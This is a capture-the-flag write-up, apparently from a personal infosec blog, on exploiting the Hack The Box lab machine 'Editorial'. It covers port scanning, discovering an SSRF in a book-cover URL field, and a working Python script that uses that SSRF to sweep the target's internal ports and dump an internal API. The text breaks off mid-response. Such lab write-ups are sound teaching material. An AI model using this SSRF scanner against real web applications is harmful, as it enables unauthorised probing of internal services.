https://crippledmind-infosec-journal.netlify.app/tags/gitpython/Recent content in GitPython on CrippledMind's InfoSec JournalHugo -- gohugo.ioen-usMon, 01 Jul 2024 10:43:04 +0530https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/Mon, 01 Jul 2024 10:43:04 +0530https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/<h2 id="introduction">Introduction </h2><ul> <li><strong>Machine Name:</strong> Editorial</li> <li><strong>IP Address:</strong> 10.10.11.20</li> <li><strong>Difficulty:</strong> Easy</li> </ul> <h2 id="information-gathering">Information Gathering </h2><p>Running the initial scan of ports show port 22 and port 80 open.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">rustscan</span> <span class="c1">--ulimit 5000 -r 1-65535 -a $IP -- -A -T4 -Pn | tee -a scan.txt</span> </span></span><span class="line"><span class="cl"><span class="n">PORT</span> <span class="n">STATE</span> <span class="n">SERVICE</span> <span class="n">REASON</span> <span class="n">VERSION</span> </span></span><span class="line"><span class="cl"><span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">ssh</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">OpenSSH</span> <span class="mf">8.9</span><span class="n">p1</span> <span class="n">Ubuntu</span> <span class="mi">3</span><span class="n">ubuntu0</span><span class="mf">.7</span> <span class="p">(</span><span class="n">Ubuntu</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">protocol</span> <span class="mf">2.0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ssh</span><span class="o">-</span><span class="n">hostkey</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">256</span> <span class="mi">0</span><span class="n">d</span><span class="p">:</span><span class="n">ed</span><span class="p">:</span><span class="n">b2</span><span class="p">:</span><span class="mi">9</span><span class="n">c</span><span class="p">:</span><span class="n">e2</span><span class="p">:</span><span class="mi">53</span><span class="p">:</span><span class="n">fb</span><span class="p">:</span><span class="n">d4</span><span class="p">:</span><span class="n">c8</span><span class="p">:</span><span class="n">c1</span><span class="p">:</span><span class="mi">19</span><span class="p">:</span><span class="mi">6</span><span class="n">e</span><span class="p">:</span><span class="mi">75</span><span class="p">:</span><span class="mi">80</span><span class="p">:</span><span class="n">d8</span><span class="p">:</span><span class="mi">64</span> <span class="p">(</span><span class="n">ECDSA</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ecdsa</span><span class="o">-</span><span class="n">sha2</span><span class="o">-</span><span class="n">nistp256</span> <span class="n">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMApl7gtas1JLYVJ1BwP3Kpc6oXk6sp2JyCHM37ULGN</span><span class="o">+</span><span class="n">DRZ4kw2BBqO</span><span class="o">/</span><span class="n">yozkui</span><span class="o">+</span><span class="n">j1Yma1wnYsxv0oVYhjGeJavM</span><span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">256</span> <span class="mi">0</span><span class="n">f</span><span class="p">:</span><span class="n">b9</span><span class="p">:</span><span class="n">a7</span><span class="p">:</span><span class="mi">51</span><span class="p">:</span><span class="mi">0</span><span class="n">e</span><span class="p">:</span><span class="mi">00</span><span class="p">:</span><span class="n">d5</span><span class="p">:</span><span class="mi">7</span><span class="n">b</span><span class="p">:</span><span class="mi">5</span><span class="n">b</span><span class="p">:</span><span class="mi">7</span><span class="n">c</span><span class="p">:</span><span class="mi">5</span><span class="n">f</span><span class="p">:</span><span class="n">bf</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span><span class="p">:</span><span class="n">ed</span><span class="p">:</span><span class="mi">53</span><span class="p">:</span><span class="n">a0</span> <span class="p">(</span><span class="n">ED25519</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_ssh</span><span class="o">-</span><span class="n">ed25519</span> <span class="n">AAAAC3NzaC1lZDI1NTE5AAAAIMXtxiT4ZZTGZX4222Zer7f</span><span class="o">/</span><span class="n">kAWwdCWM</span><span class="o">/</span><span class="n">rGzRrGVZhYx</span> </span></span><span class="line"><span class="cl"><span class="mi">80</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">http</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">nginx</span> <span class="mf">1.18.0</span> <span class="p">(</span><span class="n">Ubuntu</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="n">header</span><span class="p">:</span> <span class="n">nginx</span><span class="o">/</span><span class="mf">1.18.0</span> <span class="p">(</span><span class="n">Ubuntu</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">title</span><span class="p">:</span> <span class="n">Did</span> <span class="ow">not</span> <span class="n">follow</span> <span class="n">redirect</span> <span class="n">to</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">editorial.htb</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">methods</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span> <span class="n">Supported</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">GET</span> <span class="n">HEAD</span> <span class="n">POST</span> <span class="n">OPTIONS</span> </span></span><span class="line"><span class="cl"><span class="n">Service</span> <span class="n">Info</span><span class="p">:</span> <span class="n">OS</span><span class="p">:</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">CPE</span><span class="p">:</span> <span class="n">cpe</span><span class="p">:</span><span class="o">/</span><span class="n">o</span><span class="p">:</span><span class="n">linux</span><span class="p">:</span><span class="n">linux_kernel</span> </span></span></code></pre></div><h3 id="port-80">Port 80 </h3><p>To get the domain name running in this port, i did a curl request and added the domain to <code>/etc/hosts</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">curl</span> <span class="o">-</span><span class="n">v</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.11.20</span><span class="o">/</span> </span></span><span class="line"><span class="cl"><span class="o">*</span> <span class="n">Trying</span> <span class="mf">10.10.11.20</span><span class="p">:</span><span class="mf">80.</span><span class="o">..</span> </span></span><span class="line"><span class="cl"><span class="o">*</span> <span class="n">Connected</span> <span class="n">to</span> <span class="mf">10.10.11.20</span> <span class="p">(</span><span class="mf">10.10.11.20</span><span class="p">)</span> <span class="n">port</span> <span class="mi">80</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">GET</span> <span class="o">/</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">Host</span><span class="p">:</span> <span class="mf">10.10.11.20</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">User</span><span class="o">-</span><span class="n">Agent</span><span class="p">:</span> <span class="n">curl</span><span class="o">/</span><span class="mf">8.6.0</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">Accept</span><span class="p">:</span> <span class="o">*/*</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">301</span> <span class="n">Moved</span> <span class="n">Permanently</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Server</span><span class="p">:</span> <span class="n">nginx</span><span class="o">/</span><span class="mf">1.18.0</span> <span class="p">(</span><span class="n">Ubuntu</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Mon</span><span class="p">,</span> <span class="mi">01</span> <span class="n">Jul</span> <span class="mi">2024</span> <span class="mi">05</span><span class="p">:</span><span class="mi">29</span><span class="p">:</span><span class="mi">10</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">178</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">keep</span><span class="o">-</span><span class="n">alive</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Location</span><span class="p">:</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">editorial.htb</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">echo</span> <span class="s1">&#39;10.10.11.20 editorial.htb&#39;</span> <span class="o">|</span> <span class="n">sudo</span> <span class="n">tee</span> <span class="o">-</span><span class="n">a</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">hosts</span> </span></span></code></pre></div><p>The webpage is about books. Looking for potential entrypoints, the <code>publish with us</code> page gives us one. We have the option to give our content to be published. This is also accepting an image to be used as cover photo. We have two options, by uploading from local folder or by providing a url. This include of external url screams <code>SSRF</code>. To test it out, I started a simple HTTP Server with python in a directory containing a <code>test.jpg</code> file.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">python3</span> <span class="o">-</span><span class="n">m</span> <span class="n">http.server</span> <span class="mi">80</span> </span></span></code></pre></div><p>I gave the url, and clicked <code>preview</code>, I got a hit in my terminal and the profile picture was updated.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">python3</span> <span class="o">-</span><span class="n">m</span> <span class="n">http</span><span class="o">.</span><span class="n">server</span> <span class="mi">80</span> </span></span><span class="line"><span class="cl"><span class="n">Serving</span> <span class="n">HTTP</span> <span class="n">on</span> <span class="p">::</span> <span class="n">port</span> <span class="mi">80</span> <span class="p">(</span><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="p">[::]:</span><span class="mi">80</span><span class="o">/</span><span class="p">)</span> <span class="o">...</span> </span></span><span class="line"><span class="cl"><span class="p">::</span><span class="n">ffff</span><span class="p">:</span><span class="mf">10.10.11.20</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">01</span><span class="o">/</span><span class="n">Jul</span><span class="o">/</span><span class="mi">2024</span> <span class="mi">11</span><span class="p">:</span><span class="mi">10</span><span class="p">:</span><span class="mi">46</span><span class="p">]</span> <span class="s2">&#34;GET /test.jpeg HTTP/1.1&#34;</span> <span class="mi">200</span> <span class="o">-</span> </span></span><span class="line"><span class="cl"><span class="p">::</span><span class="n">ffff</span><span class="p">:</span><span class="mf">10.10.11.20</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">01</span><span class="o">/</span><span class="n">Jul</span><span class="o">/</span><span class="mi">2024</span> <span class="mi">11</span><span class="p">:</span><span class="mi">12</span><span class="p">:</span><span class="mi">15</span><span class="p">]</span> <span class="s2">&#34;GET /test.jpeg HTTP/1.1&#34;</span> <span class="mi">200</span> <span class="o">-</span> </span></span></code></pre></div><!-- -------------------------------------------------------------- --> <p>I opened <code>Caido</code> to look at the <code>preview</code> carefully. I captured the requests. There are two endpoints that are working when <code>preview</code> button is clicked.</p> <ol> <li><strong>/upload-cover</strong>: A post request is sent to this endpoint first to upload the file content. This endpoint then saves it to a file, and returns the <code>relative url</code> to the uploaded file.</li> </ol> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/upload.png" width="2142" height="1004" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/upload_huc1e93d90ea7c89d911561da32edcf635_334407_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/upload_huc1e93d90ea7c89d911561da32edcf635_334407_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="213" data-flex-basis="512px" ></p> <ol start="2"> <li><strong>/static/uploads/[file_name]</strong>: This endpoint fetches the file data.</li> </ol> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/fetch.png" width="2144" height="862" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/fetch_hud67320be273a9b03a377645e8bb7ccf0_368809_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/fetch_hud67320be273a9b03a377645e8bb7ccf0_368809_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="248" data-flex-basis="596px" ></p> <div class="notice notice-warning"> The uploaded file is removed very quickly, probably in 1 min. So if you request the same file again, you will get a <span style="color: #d461e8">404 Error</span> </div> <p>Now I tried if I can upload any arbitrary file. I made a <code>test</code> file with the text <code>Hello Mommy!!!</code>, started the python server, requested the file through <code>preview</code> endpoint, and looked in the <code>static</code> endpoint in <code>Caido</code>. 🎉 Got the <code>test</code> file contents in the response. So this shows that this can read and show anything - <strong>SSRF</strong>. You can even give <code>http://127.0.0.1/</code> and it will return the home page html content. 😂</p> <h2 id="ssrf-exploitation">SSRF Exploitation </h2><p>First thing to do is always find if any other ports are running anything internally that are not public. So to do this manually is not possible. So i made a python script that will run through all the ports from 1 to 65535 to find the internal services.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">concurrent.futures</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Function to send POST request and get the relative URL</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_post_request</span><span class="p">(</span><span class="n">port</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">url</span> <span class="o">=</span> <span class="s2">&#34;http://editorial.htb/upload-cover&#34;</span> </span></span><span class="line"><span class="cl"> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Host&#34;</span><span class="p">:</span> <span class="s2">&#34;editorial.htb&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;User-Agent&#34;</span><span class="p">:</span> <span class="s2">&#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Content-Type&#34;</span><span class="p">:</span> <span class="s2">&#34;multipart/form-data; boundary=----WebKitFormBoundaryLcrnsJGUaxiPah2I&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept&#34;</span><span class="p">:</span> <span class="s2">&#34;*/*&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Origin&#34;</span><span class="p">:</span> <span class="s2">&#34;http://editorial.htb&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Referer&#34;</span><span class="p">:</span> <span class="s2">&#34;http://editorial.htb/upload&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Encoding&#34;</span><span class="p">:</span> <span class="s2">&#34;gzip, deflate&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Language&#34;</span><span class="p">:</span> <span class="s2">&#34;en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dnt&#34;</span><span class="p">:</span> <span class="s2">&#34;1&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;sec-gpc&#34;</span><span class="p">:</span> <span class="s2">&#34;1&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&#34;&#34;&#34;------WebKitFormBoundaryLcrnsJGUaxiPah2I </span></span></span><span class="line"><span class="cl"><span class="s2">Content-Disposition: form-data; name=&#34;bookurl&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">http://127.0.0.1:</span><span class="si">{</span><span class="n">port</span><span class="si">}</span><span class="s2">/ </span></span></span><span class="line"><span class="cl"><span class="s2">------WebKitFormBoundaryLcrnsJGUaxiPah2I </span></span></span><span class="line"><span class="cl"><span class="s2">Content-Disposition: form-data; name=&#34;bookfile&#34;; filename=&#34;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">Content-Type: application/octet-stream </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">------WebKitFormBoundaryLcrnsJGUaxiPah2I--&#34;&#34;&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">response</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="c1"># Extract the relative URL from the response</span> </span></span><span class="line"><span class="cl"> <span class="n">relative_url</span> <span class="o">=</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">port</span><span class="p">,</span> <span class="n">relative_url</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">port</span><span class="p">,</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Function to send GET request based on the relative URL</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_get_request</span><span class="p">(</span><span class="n">port</span><span class="p">,</span> <span class="n">relative_url</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">relative_url</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">url</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&#34;http://editorial.htb/</span><span class="si">{</span><span class="n">relative_url</span><span class="si">}</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Host&#34;</span><span class="p">:</span> <span class="s2">&#34;editorial.htb&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;User-Agent&#34;</span><span class="p">:</span> <span class="s2">&#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept&#34;</span><span class="p">:</span> <span class="s2">&#34;image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Referer&#34;</span><span class="p">:</span> <span class="s2">&#34;http://editorial.htb/&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Encoding&#34;</span><span class="p">:</span> <span class="s2">&#34;gzip, deflate&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Language&#34;</span><span class="p">:</span> <span class="s2">&#34;en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dnt&#34;</span><span class="p">:</span> <span class="s2">&#34;1&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;sec-gpc&#34;</span><span class="p">:</span> <span class="s2">&#34;1&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">port</span><span class="p">,</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">port</span><span class="p">,</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Function to process each payload</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">process_payload</span><span class="p">(</span><span class="n">port</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">port</span><span class="p">,</span> <span class="n">relative_url</span> <span class="o">=</span> <span class="n">send_post_request</span><span class="p">(</span><span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">relative_url</span> <span class="ow">and</span> <span class="ow">not</span> <span class="p">(</span><span class="n">relative_url</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s2">&#34;.png&#34;</span><span class="p">)</span> <span class="ow">or</span> <span class="n">relative_url</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s2">&#34;.jpeg&#34;</span><span class="p">)</span> <span class="ow">or</span> <span class="n">relative_url</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s2">&#34;.jpg&#34;</span><span class="p">)):</span> </span></span><span class="line"><span class="cl"> <span class="n">port</span><span class="p">,</span> <span class="n">output</span> <span class="o">=</span> <span class="n">send_get_request</span><span class="p">(</span><span class="n">port</span><span class="p">,</span> <span class="n">relative_url</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">port</span><span class="p">,</span> <span class="n">relative_url</span><span class="p">,</span> <span class="n">output</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">port</span><span class="p">,</span> <span class="n">relative_url</span><span class="p">,</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Main function to read payloads and execute the requests concurrently</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="c1"># Read ports from payload.txt</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">strip</span><span class="p">(),</span> <span class="s1">&#39;r&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">file</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">ports</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">file</span><span class="o">.</span><span class="n">readlines</span><span class="p">()]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># Use ThreadPoolExecutor to handle concurrent requests</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="n">concurrent</span><span class="o">.</span><span class="n">futures</span><span class="o">.</span><span class="n">ThreadPoolExecutor</span><span class="p">(</span><span class="n">max_workers</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">futures</span> <span class="o">=</span> <span class="p">[</span><span class="n">executor</span><span class="o">.</span><span class="n">submit</span><span class="p">(</span><span class="n">process_payload</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="k">for</span> <span class="n">port</span> <span class="ow">in</span> <span class="n">ports</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">future</span> <span class="ow">in</span> <span class="n">futures</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">port</span><span class="p">,</span> <span class="n">post_response</span><span class="p">,</span> <span class="n">get_response</span> <span class="o">=</span> <span class="n">future</span><span class="o">.</span><span class="n">result</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="c1"># print(f&#34;Payload used: http://127.0.0.1:{port}/&#34;)</span> </span></span><span class="line"><span class="cl"> <span class="c1"># print(f&#34;Post Response: {post_response}&#34;)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">get_response</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Payload used: http://127.0.0.1:</span><span class="si">{</span><span class="n">port</span><span class="si">}</span><span class="s2">/&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Get Response: </span><span class="si">{</span><span class="n">get_response</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><p>After 2-3 mins, I got a hit on port **** of an API endpoint.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">python</span> <span class="n">ssrfexploit.py</span> <span class="n">payloads.txt</span> </span></span><span class="line"><span class="cl"><span class="n">Payload</span> <span class="n">used</span><span class="p">:</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">127.0.0.1</span><span class="p">:</span><span class="o">****/</span> </span></span><span class="line"><span class="cl"><span class="n">Get</span> <span class="n">Response</span><span class="p">:</span> <span class="p">{</span><span class="s2">&#34;messages&#34;</span><span class="p">:[{</span><span class="s2">&#34;promotions&#34;</span><span class="p">:{</span><span class="s2">&#34;description&#34;</span><span class="p">:</span><span class="s2">&#34;Retrieve a list of all the promotions in our library.&#34;</span><span class="p">,</span><span class="s2">&#34;endpoint&#34;</span><span class="p">:</span><span class="s2">&#34;/api/latest/metadata/messages/promos&#34;</span><span class="p">,</span><span class="s2">&#34;methods&#34;</span><span class="p">:</span><span class="s2">&#34;GET&#34;</span><span class="p">}},{</span><span class="s2">&#34;coupons&#34;</span><span class="p">:{</span><span class="s2">&#34;description&#34;</span><span class="p">:</span><span class="s2">&#34;Retrieve the list of coupons to use in our library.&#34;</span><span class="p">,</span><span class="s2">&#34;endpoint&#34;</span><span class="p">:</span><span class="s2">&#34;/api/latest/metadata/messages/coupons&#34;</span><span class="p">,</span><span class="s2">&#34;methods&#34;</span><span class="p">:</span><span class="s2">&#34;GET&#34;</span><span class="p">}},{</span><span class="s2">&#34;new_authors&#34;</span><span class="p">:{</span><span class="s2">&#34;description&#34;</span><span class="p">:</span><span class="s2">&#34;Retrieve the welcome message sended to our new authors.&#34;</span><span class="p">,</span><span class="s2">&#34;endpoint&#34;</span><span class="p">:</span><span class="s2">&#34;/api/latest/metadata/messages/authors&#34;</span><span class="p">,</span><span class="s2">&#34;methods&#34;</span><span class="p">:</span><span class="s2">&#34;GET&#34;</span><span class="p">}},{</span><span class="s2">&#34;platform_use&#34;</span><span class="p">:{</span><span class="s2">&#34;description&#34;</span><span class="p">:</span><span class="s2">&#34;Retrieve examples of how to use the platform.&#34;</span><span class="p">,</span><span class="s2">&#34;endpoint&#34;</span><span class="p">:</span><span class="s2">&#34;/api/latest/metadata/messages/how_to_use_platform&#34;</span><span class="p">,</span><span class="s2">&#34;methods&#34;</span><span class="p">:</span><span class="s2">&#34;GET&#34;</span><span class="p">}}],</span><span class="s2">&#34;version&#34;</span><span class="p">:[{</span><span class="s2">&#34;changelog&#34;</span><span class="p">:{</span><span class="s2">&#34;description&#34;</span><span class="p">:</span><span class="s2">&#34;Retrieve a list of all the versions and updates of the api.&#34;</span><span class="p">,</span><span class="s2">&#34;endpoint&#34;</span><span class="p">:</span><span class="s2">&#34;/api/latest/metadata/changelog&#34;</span><span class="p">,</span><span class="s2">&#34;methods&#34;</span><span 